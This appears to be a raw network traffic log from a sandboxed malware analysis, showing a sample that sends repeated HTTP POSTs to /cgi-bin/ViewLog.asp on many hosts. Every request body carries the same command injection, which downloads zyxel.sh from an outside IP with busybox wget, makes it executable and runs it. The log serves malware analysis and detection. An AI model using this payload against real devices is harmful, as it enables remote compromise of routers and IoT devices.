                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            282192.168.2.234794494.121.75.1978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.616214037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            283192.168.2.233873694.120.214.568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.616406918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            284192.168.2.235117094.123.117.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.617752075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            285192.168.2.234032094.121.126.228080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.617907047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            286192.168.2.233375094.122.21.868080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.618057013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            287192.168.2.234514285.130.16.98080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.621532917 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.943320036 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.193387032 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:28:27 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
                                                            Feb 14, 2024 09:28:30.449403048 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:28:27 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
                                                            Feb 14, 2024 09:28:31.967719078 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:28:27 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
                                                            Feb 14, 2024 09:28:34.997647047 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:28:27 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
                                                            Feb 14, 2024 09:28:41.064490080 CET561INHTTP/1.1 404 Not Found
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Headers: Content-Type
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Date: Wed, 14 Feb 2024 08:28:27 GMT
                                                            Server: WebServer
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            288192.168.2.233341694.230.149.1708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.830013037 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.951266050 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.262973070 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.982719898 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:39.357963085 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:49.852402925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:11.865366936 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.867331028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            289192.168.2.234295094.120.96.328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.861946106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            290192.168.2.233424694.121.31.1628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.862580061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            291192.168.2.235044694.120.245.2388080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.863557100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            292192.168.2.234250631.200.102.2178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:28.865696907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
